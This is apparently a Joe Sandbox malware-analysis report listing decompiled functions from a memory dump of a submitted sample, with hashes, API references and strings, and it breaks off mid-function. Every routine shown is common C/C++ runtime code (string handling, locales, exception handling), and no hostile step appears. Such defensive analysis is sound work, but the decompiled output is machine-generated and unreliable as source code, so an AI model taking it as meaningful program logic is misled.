Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 915c558604a95052b8ac931732547fc7930cf701a221bf6a5ff6d9387843e197
Instruction ID: 01bc999e1b7be5e153ef6d05f4b2f2919289875cc00f2a0e1949ed60480c91a7
Opcode Fuzzy Hash: 915c558604a95052b8ac931732547fc7930cf701a221bf6a5ff6d9387843e197
Instruction Fuzzy Hash: D711A7307003109BDA34AE6D8940A27B7E9DF82748F10053FF586A76C1C7B9EC4B869D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E407 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E407(intOrPtr* __eax, intOrPtr* __edi, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr* _t31;
				intOrPtr* _t36;
				intOrPtr _t38;
				intOrPtr _t39;

				_t36 = __edi;
				_t29 = __eax;
				_t17 = _a4;
				_t38 =  *((intOrPtr*)(__eax + 0x10));
				if(_t38 < _t17) {
					_t17 = E0041EBF0("invalid string position");
				}
				_t39 = _t38 - _t17;
				if(_a8 < _t39) {
					_t39 = _a8;
				}
				if(_t36 != _t29) {
					if(E0040E54D(_t29, _t36, _t39) != 0) {
						if( *((intOrPtr*)(_t29 + 0x14)) < 8) {
							_t21 = _t29;
						} else {
							_t21 =  *_t29;
						}
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t31 = _t36;
						} else {
							_t31 =  *_t36;
						}
						_t30 = _t39 + _t39;
						E0041F8C0(_t31, _t21 + _a4 * 2, _t30);
						 *((intOrPtr*)(_t36 + 0x10)) = _t39;
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t24 = _t36;
						} else {
							_t24 =  *_t36;
						}
						 *((short*)(_t30 + _t24)) = 0;
					}
				} else {
					E0040E4DC(_t17 | 0xffffffff, _t39 + _t17, _t36);
					E0040E4DC(_a4, 0, _t36);
				}
				return _t36;
			}

0x0040e407
0x0040e40b
0x0040e40d
0x0040e411
0x0040e416
0x0040e41d
0x0040e41d
0x0040e422
0x0040e427
0x0040e429
0x0040e429
0x0040e42e
0x0040e452
0x0040e458
0x0040e45e
0x0040e45a
0x0040e45a
0x0040e45a
0x0040e464
0x0040e46a
0x0040e466
0x0040e466
0x0040e466
0x0040e46f
0x0040e478
0x0040e484
0x0040e487
0x0040e48d
0x0040e489
0x0040e489
0x0040e489
0x0040e491
0x0040e491
0x0040e430
0x0040e438
0x0040e442
0x0040e442
0x0040e49a

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040E41D

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

Part of subcall function 0040E54D: std::_Xinvalid_argument.LIBCPMT ref: 0040E55A

_memmove.LIBCMT ref: 0040E478

Strings

invalid string position, xrefs: 0040E418

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 83a2c4ac2c95b09a6a61c83b790b5457603199222e5ac8d7effa31d1344e3f27
Instruction ID: 84c60b7ab390b6ee52f0a56c72c17f8ebbdd5a19781eaca7761274d4db8db460
Opcode Fuzzy Hash: 83a2c4ac2c95b09a6a61c83b790b5457603199222e5ac8d7effa31d1344e3f27
Instruction Fuzzy Hash: E0115431304114DBCB14EE2AD5C1469B3A9BF453687504D3BF816AB281D738ED69CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00418781(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				intOrPtr* _t37;
				signed int _t43;
				signed int _t44;
				void* _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr* _t55;
				void* _t56;
				void* _t57;

				_t57 = __eflags;
				_t49 = __ecx;
				_push(4);
				E00423610(E00433C56, __ebx, __edi, __esi);
				_t53 =  *((intOrPtr*)(_t56 + 8));
				 *(_t56 - 0x10) =  *(_t56 - 0x10) & 0x00000000;
				 *_t53 = 0x43fde8;
				 *((intOrPtr*)(_t53 + 0x68)) = 0x43fd50;
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				_t55 = _t53 + 0x10;
				_push(_t55);
				_push(_t53);
				 *(_t56 - 0x10) = 1;
				E00415FE1(1, _t53, _t55, _t57);
				 *(_t56 - 4) = 1;
				 *((intOrPtr*)(_t53 +  *((intOrPtr*)( *_t53 + 4)))) = 0x43fde4;
				E004163B5(1, _t53, _t55, _t57, _t55);
				 *_t55 = 0x43fda4;
				 *((char*)(_t55 + 0x50)) = 0;
				 *((char*)(_t55 + 0x49)) = 0;
				E0041641E(_t55);
				_t36 =  *0x4477d8; // 0x0
				 *(_t55 + 0x54) =  *(_t55 + 0x54) & 0x00000000;
				 *(_t55 + 0x44) =  *(_t55 + 0x44) & 0x00000000;
				 *((intOrPtr*)(_t55 + 0x4c)) = _t36;
				_t37 =  *((intOrPtr*)(_t56 + 0xc));
				 *(_t56 - 4) = 2;
				_t58 =  *((intOrPtr*)(_t37 + 0x14)) - 0x10;
				if( *((intOrPtr*)(_t37 + 0x14)) >= 0x10) {
					_t37 =  *_t37;
				}
				_push(0x21);
				_push(_t37);
				if(E004160AF(_t55, _t49, _t53, _t55, _t58) == 0) {
					_t51 =  *((intOrPtr*)( *_t53 + 4)) + _t53;
					_t43 =  *(_t51 + 0xc) | 0x00000002;
					if( *((intOrPtr*)(_t51 + 0x38)) == 0) {
						_t43 = _t43 | 0x00000004;
					}
					_t44 = _t43 & 0x00000017;
					 *(_t51 + 0xc) = _t44;
					if(( *(_t51 + 0x10) & _t44) != 0) {
						E0040F4EC(0);
					}
				}
				return E004236AF(_t53);
			}

0x00418781
0x00418781
0x00418781
0x00418788
0x0041878d
0x00418790
0x00418794
0x0041879a
0x004187a1
0x004187a5
0x004187aa
0x004187ac
0x004187ad
0x004187b0
0x004187b5
0x004187be
0x004187c5
0x004187cc
0x004187d2
0x004187d6
0x004187da
0x004187df
0x004187e4
0x004187e8
0x004187ec
0x004187ef
0x004187f2
0x004187f6
0x004187fa
0x004187fc
0x004187fc
0x004187fe
0x00418800
0x0041880a
0x00418811
0x00418816
0x0041881d
0x0041881f
0x0041881f
0x00418822
0x00418825
0x0041882b
0x0041882f
0x0041882f
0x0041882b
0x0041883b

APIs

__EH_prolog3.LIBCMT ref: 00418788

Part of subcall function 00415FE1: __EH_prolog3.LIBCMT ref: 00415FE8

Part of subcall function 004163B5: __EH_prolog3.LIBCMT ref: 004163BC
Part of subcall function 004163B5: std::_Mutex::_Mutex.LIBCPMT ref: 004163CD
Part of subcall function 004163B5: std::locale::_Init.LIBCPMT ref: 004163E4
Part of subcall function 004163B5: std::locale::facet::_Incref.LIBCPMT ref: 004163F2

Strings

G_A, xrefs: 004187BE
{_A, xrefs: 004187CC

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3$IncrefInitMutexMutex::_std::_std::locale::_std::locale::facet::_
String ID: G_A${_A
API String ID: 2252641541-3481784343
Opcode ID: f09784da0500f4020b982d9ef0a5b022c9a57c65e3392a5f79d1901551a95987
Instruction ID: 0652e0e38d8bdebfcdb94aced09a0bd92fa649400d4ab2462fac1255e76c3031
Opcode Fuzzy Hash: f09784da0500f4020b982d9ef0a5b022c9a57c65e3392a5f79d1901551a95987
Instruction Fuzzy Hash: 2121AC706003019FEB20DF19C889B9AB7F0FF18319F54882EE1458B382C7B8E955CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404C57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00404C57(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr* _t19;
				intOrPtr _t20;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr* _t28;

				_t28 = __ecx;
				_t9 =  *((intOrPtr*)(__ecx + 0x10));
				_t18 = _a4;
				if(_t9 < _t18) {
					_t9 = E0041EBF0("invalid string position");
				}
				_t16 = _a8;
				_t10 = _t9 - _t18;
				if(_t10 < _t16) {
					_t16 = _t10;
				}
				if(_t16 != 0) {
					_t20 =  *((intOrPtr*)(_t28 + 0x14));
					if(_t20 < 0x10) {
						_t24 = _t28;
					} else {
						_t24 =  *_t28;
					}
					if(_t20 < 0x10) {
						_t21 = _t28;
					} else {
						_t21 =  *_t28;
					}
					E0041FE70(_t21 + _t18, _t24 + _t18 + _t16, _t10 - _t16);
					_t15 =  *((intOrPtr*)(_t28 + 0x10)) - _t16;
					 *((intOrPtr*)(_t28 + 0x10)) = _t15;
					if( *((intOrPtr*)(_t28 + 0x14)) < 0x10) {
						_t19 = _t28;
					} else {
						_t19 =  *_t28;
					}
					 *((char*)(_t19 + _t15)) = 0;
				}
				return _t28;
			}

0x00404c5c
0x00404c5e
0x00404c61
0x00404c66
0x00404c6d
0x00404c6d
0x00404c72
0x00404c75
0x00404c79
0x00404c7b
0x00404c7b
0x00404c7f
0x00404c81
0x00404c88
0x00404c8e
0x00404c8a
0x00404c8a
0x00404c8a
0x00404c93
0x00404c99
0x00404c95
0x00404c95
0x00404c95
0x00404ca6
0x00404cb1
0x00404cb7
0x00404cbb
0x00404cc1
0x00404cbd
0x00404cbd
0x00404cbd
0x00404cc3
0x00404cc3
0x00404ccc

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404C6D

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

_memmove.LIBCMT ref: 00404CA6

Strings

invalid string position, xrefs: 00404C68

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 015f7f3b79d29f21ac2cf7ce5b9c05e3be0ff160d9ea8c1c4655298345db2a53
Instruction ID: d1b22b69b108cb50c1416096318adb7bcf4c4d9aea57cd6a7f1eaa203a597f66
Opcode Fuzzy Hash: 015f7f3b79d29f21ac2cf7ce5b9c05e3be0ff160d9ea8c1c4655298345db2a53
Instruction Fuzzy Hash: 9101F5B13096105BE3248D68D984817B7A6EBC17107224E3EE64297781CB78EC4687E8

Uniqueness

Uniqueness Score: -1.00%

Function 004157AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004157AF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				signed int _t41;
				signed int _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				intOrPtr* _t53;
				void* _t54;
				void* _t55;

				_t55 = __eflags;
				_push(4);
				E00423610(E00433C56, __ebx, __edi, __esi);
				_t51 =  *((intOrPtr*)(_t54 + 8));
				 *(_t54 - 0x10) =  *(_t54 - 0x10) & 0x00000000;
				 *_t51 = 0x43fde8;
				 *((intOrPtr*)(_t51 + 0x68)) = 0x43fd50;
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				_t7 = _t51 + 0x10; // 0x10
				_t53 = _t7;
				_push(_t53);
				_push(_t51);
				 *(_t54 - 0x10) = 1;
				E00415FE1(1, _t51, _t53, _t55);
				 *(_t54 - 4) = 1;
				 *((intOrPtr*)(_t51 +  *((intOrPtr*)( *_t51 + 4)))) = 0x43fde4;
				E004163B5(1, _t51, _t53, _t55, _t53);
				 *_t53 = 0x43fda4;
				 *((char*)(_t53 + 0x50)) = 0;
				 *((char*)(_t53 + 0x49)) = 0;
				E0041641E(_t53);
				_t35 =  *0x4477d8; // 0x0
				 *(_t53 + 0x54) =  *(_t53 + 0x54) & 0x00000000;
				 *(_t53 + 0x44) =  *(_t53 + 0x44) & 0x00000000;
				 *((intOrPtr*)(_t53 + 0x4c)) = _t35;
				_push(1);
				_push( *((intOrPtr*)(_t54 + 0xc)));
				 *(_t54 - 4) = 2;
				if(E004160AF(_t53, _t47, _t51, _t53, _t55) == 0) {
					_t49 =  *((intOrPtr*)( *_t51 + 4)) + _t51;
					_t41 =  *(_t49 + 0xc) | 0x00000002;
					if( *((intOrPtr*)(_t49 + 0x38)) == 0) {
						_t41 = _t41 | 0x00000004;
					}
					_t42 = _t41 & 0x00000017;
					 *(_t49 + 0xc) = _t42;
					if(( *(_t49 + 0x10) & _t42) != 0) {
						E0040F4EC(0);
					}
				}
				return E004236AF(_t51);
			}

0x004157af
0x004157af
0x004157b6
0x004157bb
0x004157be
0x004157c2
0x004157c8
0x004157cf
0x004157d3
0x004157d3
0x004157d8
0x004157da
0x004157db
0x004157de
0x004157e3
0x004157ec
0x004157f3
0x004157fa
0x00415800
0x00415804
0x00415808
0x0041580d
0x00415812
0x00415816
0x0041581a
0x0041581d
0x0041581e
0x00415823
0x0041582e
0x00415835
0x0041583a
0x00415841
0x00415843
0x00415843
0x00415846
0x00415849
0x0041584f
0x00415853
0x00415853
0x0041584f
0x0041585f

APIs

__EH_prolog3.LIBCMT ref: 004157B6

Part of subcall function 00415FE1: __EH_prolog3.LIBCMT ref: 00415FE8

Part of subcall function 004163B5: __EH_prolog3.LIBCMT ref: 004163BC
Part of subcall function 004163B5: std::_Mutex::_Mutex.LIBCPMT ref: 004163CD
Part of subcall function 004163B5: std::locale::_Init.LIBCPMT ref: 004163E4
Part of subcall function 004163B5: std::locale::facet::_Incref.LIBCPMT ref: 004163F2

Part of subcall function 004160AF: __EH_prolog3.LIBCMT ref: 004160B6

Strings

G_A, xrefs: 004157EC
{_A, xrefs: 004157FA

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3$IncrefInitMutexMutex::_std::_std::locale::_std::locale::facet::_
String ID: G_A${_A
API String ID: 2252641541-3481784343
Opcode ID: 726a4baacc20a3ea3bb54d1210010d35339577930912a4b6b1b2691cb0198f44
Instruction ID: 2cb74a3a26b320b8314030a5adc4c1a23db2db234698b3b57161561dd652278c
Opcode Fuzzy Hash: 726a4baacc20a3ea3bb54d1210010d35339577930912a4b6b1b2691cb0198f44
Instruction Fuzzy Hash: CD219A70A10711DFEB20DF19C845BAAB7F4FF14319F14842EE1459B242C3B8E955CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E4DC(void* __eax, signed int __ecx, intOrPtr* __esi) {
				intOrPtr _t14;
				void* _t15;
				signed int _t24;
				intOrPtr* _t26;
				signed int _t28;
				intOrPtr* _t29;
				intOrPtr _t30;
				intOrPtr* _t31;
				void* _t33;
				intOrPtr* _t34;

				_t34 = __esi;
				_t28 = __ecx;
				_t33 = __eax;
				_t14 =  *((intOrPtr*)(__esi + 0x10));
				if(_t14 < __ecx) {
					_t14 = E0041EBF0("invalid string position");
				}
				_t15 = _t14 - _t28;
				if(_t15 < _t33) {
					_t33 = _t15;
				}
				if(_t33 != 0) {
					_t30 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t30 < 8) {
						_t26 = _t34;
					} else {
						_t26 =  *_t34;
					}
					if(_t30 < 8) {
						_t31 = _t34;
					} else {
						_t31 =  *_t34;
					}
					E0041FE70(_t31 + _t28 * 2, _t26 + (_t28 + _t33) * 2, _t15 - _t33 + _t15 - _t33);
					_t24 =  *(_t34 + 0x10) - _t33;
					 *(_t34 + 0x10) = _t24;
					if( *((intOrPtr*)(_t34 + 0x14)) < 8) {
						_t29 = _t34;
					} else {
						_t29 =  *_t34;
					}
					 *((short*)(_t29 + _t24 * 2)) = 0;
				}
				return _t34;
			}

0x0040e4dc
0x0040e4dc
0x0040e4dd
0x0040e4df
0x0040e4e4
0x0040e4eb
0x0040e4eb
0x0040e4f0
0x0040e4f4
0x0040e4f6
0x0040e4f6
0x0040e4fa
0x0040e4fc
0x0040e503
0x0040e509
0x0040e505
0x0040e505
0x0040e505
0x0040e50e
0x0040e514
0x0040e510
0x0040e510
0x0040e510
0x0040e526
0x0040e531
0x0040e537
0x0040e53b
0x0040e541
0x0040e53d
0x0040e53d
0x0040e53d
0x0040e545
0x0040e545
0x0040e54c

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040E4EB

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

_memmove.LIBCMT ref: 0040E526

Strings

invalid string position, xrefs: 0040E4E6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: d4c2ba8727e818928180f542799bb5caf5f50ea146d98e56915169f9dc553934
Instruction ID: 89bef51a13d4ea01fd9a8c10c903f38f3cc3031702e045805c99128c99f5b562
Opcode Fuzzy Hash: d4c2ba8727e818928180f542799bb5caf5f50ea146d98e56915169f9dc553934
Instruction Fuzzy Hash: 2901527130061197C720CEAADD8481AB3A6ABC57083240D3ED042D7655E634E8668798

Uniqueness

Uniqueness Score: -1.00%

Function 004239AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E004239AC(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v48;
				intOrPtr* _v52;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;
				LONG* _t59;
				LONG* _t60;
				void* _t66;
				intOrPtr* _t67;
				LONG* _t70;
				LONG* _t71;
				intOrPtr* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t91;
				void* _t97;
				char* _t101;
				intOrPtr _t105;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t90 = __ecx;
				_t1 =  &_a12; // 0x423cef
				_t105 =  *_t1;
				_t50 = E004203AC(_a4, _a8, _t105);
				_t110 = _t109 + 0xc;
				if(_t50 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0042685C();
					asm("int3");
					_t111 = _t110 - 0x10;
					_push(0);
					_v48 = 1;
					_t52 = E00424E0F(0x355);
					_pop(_t91);
					_v52 = _t52;
					if(_t52 != 0) {
						_t12 = _t52 + 4; // 0x4
						_t101 = _t12;
						 *_t101 = 0;
						 *_t52 = 1;
						_push( *((intOrPtr*)(_t105 + 0x58)));
						_push(0x435534);
						_push( *0x435474);
						E0042384C(_t91, _t101, 0x351, 3);
						_t14 = _t105 + 0x58; // 0x58
						_t112 = _t111 + 0x18;
						_v12 = 0x435474;
						_v16 = _t14;
						while(1) {
							_t55 = E0042C007(_t101, 0x351, ";");
							_t113 = _t112 + 0xc;
							if(_t55 != 0) {
								break;
							}
							_t18 = _v16 + 0x10; // 0x10
							_v16 = _t18;
							_t66 = E0041F730( *_v16,  *_t18);
							_pop(_t97);
							if(_t66 != 0) {
								_v20 = _v20 & 0x00000000;
							}
							_t67 = _v16;
							_push( *_t67);
							_v12 = _v12 + 0xc;
							_push(0x435534);
							_v16 = _t67;
							_push( *_v12);
							E0042384C(_t97, _t101, 0x351, 3);
							_t112 = _t113 + 0x18;
							if(_v12 < 0x4354a4) {
								continue;
							} else {
								if(_v20 != 0) {
									L22:
									E0041FC21(_v24);
									_t59 =  *(_t105 + 0x50);
									if(_t59 != 0 && InterlockedDecrement(_t59) == 0) {
										E0041FC21( *(_t105 + 0x50));
									}
									_t60 =  *(_t105 + 0x54);
									if(_t60 != 0 && InterlockedDecrement(_t60) == 0) {
										E0041FC21( *(_t105 + 0x54));
									}
									_t52 =  *((intOrPtr*)(_t105 + 0x68));
									 *(_t105 + 0x54) = 0;
									 *(_t105 + 0x4c) = 0;
									 *(_t105 + 0x50) = 0;
									 *((intOrPtr*)(_t105 + 0x48)) = 0;
								} else {
									_t70 =  *(_t105 + 0x50);
									if(_t70 != 0 && InterlockedDecrement(_t70) == 0) {
										E0041FC21( *(_t105 + 0x50));
									}
									_t71 =  *(_t105 + 0x54);
									if(_t71 != 0 && InterlockedDecrement(_t71) == 0) {
										E0041FC21( *(_t105 + 0x54));
									}
									_t33 =  &_v24; // 0x4242e4
									 *(_t105 + 0x54) =  *(_t105 + 0x54) & 0x00000000;
									 *(_t105 + 0x4c) =  *(_t105 + 0x4c) & 0x00000000;
									 *(_t105 + 0x50) =  *_t33;
									 *((intOrPtr*)(_t105 + 0x48)) = _t101;
									_t52 = _t101;
								}
							}
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E0042685C();
						goto L22;
					}
					L30:
					return _t52;
				} else {
					_t77 = _t105 + 0x40;
					if( *_t77 != 0) {
						_push(_t77);
						_push("_");
						E0042384C(_t90, _a4, _a8, 2);
						_t110 = _t110 + 0x14;
					}
					_t78 = _t105 + 0x80;
					if( *_t78 != 0) {
						_push(_t78);
						_push(".");
						return E0042384C(_t90, _a4, _a8, 2);
					}
					return _t78;
				}
			}

0x004239ac
0x004239b3
0x004239b3
0x004239bd
0x004239c2
0x004239c9
0x00423a0c
0x00423a0d
0x00423a0e
0x00423a0f
0x00423a10
0x00423a11
0x00423a16
0x00423a1c
0x00423a1f
0x00423a28
0x00423a2b
0x00423a30
0x00423a31
0x00423a36
0x00423a3d
0x00423a3d
0x00423a40
0x00423a43
0x00423a45
0x00423a4d
0x00423a52
0x00423a5c
0x00423a61
0x00423a64
0x00423a67
0x00423a6e
0x00423a71
0x00423a78
0x00423a7d
0x00423a82
0x00000000
0x00000000
0x00423a8b
0x00423a90
0x00423a95
0x00423a9b
0x00423a9e
0x00423aa0
0x00423aa0
0x00423aa4
0x00423aa7
0x00423aa9
0x00423aad
0x00423ab2
0x00423ab8
0x00423abe
0x00423ac3
0x00423acd
0x00000000
0x00423acf
0x00423ad3
0x00423b2a
0x00423b2d
0x00423b32
0x00423b40
0x00423b4c
0x00423b51
0x00423b52
0x00423b57
0x00423b63
0x00423b68
0x00423b69
0x00423b6c
0x00423b6f
0x00423b72
0x00423b75
0x00423ad5
0x00423ad5
0x00423ae0
0x00423aec
0x00423af1
0x00423af2
0x00423af7
0x00423b03
0x00423b08
0x00423b09
0x00423b0c
0x00423b10
0x00423b14
0x00423b17
0x00423b1a
0x00423b1a
0x00423ad3
0x00000000
0x00423b78
0x00423b20
0x00423b21
0x00423b22
0x00423b23
0x00423b24
0x00423b25
0x00000000
0x00423b25
0x00423b79
0x00423b7b
0x004239cb
0x004239cb
0x004239d0
0x004239d2
0x004239d3
0x004239e0
0x004239e5
0x004239e5
0x004239e8
0x004239f2
0x004239f4
0x004239f5
0x00000000
0x00423a07
0x00423a0b
0x00423a0b

APIs

_strcpy_s.LIBCMT ref: 004239BD
__invoke_watson.LIBCMT ref: 00423A11

Part of subcall function 0042384C: _strcat_s.LIBCMT ref: 0042386B

Strings

<B, xrefs: 004239B3, 004239B6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __invoke_watson_strcat_s_strcpy_s
String ID: <B
API String ID: 312943863-252759519
Opcode ID: f5bde6fcf399833e1acdbb1e67e4be212a4efafd89094227f5859cf8643f3344
Instruction ID: 76c46b879b0c213962ed941b8e28fea8c06042c5923873e5af7875a236e9370b
Opcode Fuzzy Hash: f5bde6fcf399833e1acdbb1e67e4be212a4efafd89094227f5859cf8643f3344
Instruction Fuzzy Hash: 31F022726002687BDB116F91EC02E973F6DAB00350F858026FA084A012D33ADE18C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 004253F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E004253F3(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E0042355E(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E00428172(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E00428172(__ebx, __edx, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E00423537(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E0042517A(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}

0x004253f3
0x004253f6
0x004253fc
0x0042540a
0x00425410
0x00425418
0x00425424
0x0042542c
0x00425434
0x00425448
0x0042544a
0x0042544e
0x00425453
0x00425459
0x0042545b
0x0042545d
0x00425460
0x00000000
0x00425467
0x0042545b
0x0042544e
0x00425448
0x00425434
0x00425468

APIs

Part of subcall function 0042355E: __getptd.LIBCMT ref: 00423564
Part of subcall function 0042355E: __getptd.LIBCMT ref: 00423574

__getptd.LIBCMT ref: 00425402

Part of subcall function 00428172: __getptd_noexit.LIBCMT ref: 00428175
Part of subcall function 00428172: __amsg_exit.LIBCMT ref: 00428182

__getptd.LIBCMT ref: 00425410

Strings

csm, xrefs: 0042541E

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 3fe8c5108863867c611b85978ea4e863f1689657438ed7d667db5cb0d06a1226
Instruction ID: 392dc22fe55c0bcf37aa6c6d846e8a23d1367a1b46460c32afcf65eb3d932be4
Opcode Fuzzy Hash: 3fe8c5108863867c611b85978ea4e863f1689657438ed7d667db5cb0d06a1226
Instruction Fuzzy Hash: 27011A34A017259ACF28AE25E4407AEB7B5AB10326FD8445FE04556291CB389AD1CE59

Uniqueness

Uniqueness Score: -1.00%

Function 0042384C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 48%

			E0042384C(void* __ecx, signed int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v0;
				intOrPtr* _v28;
				intOrPtr _v32;
				void* _t22;
				signed int _t25;
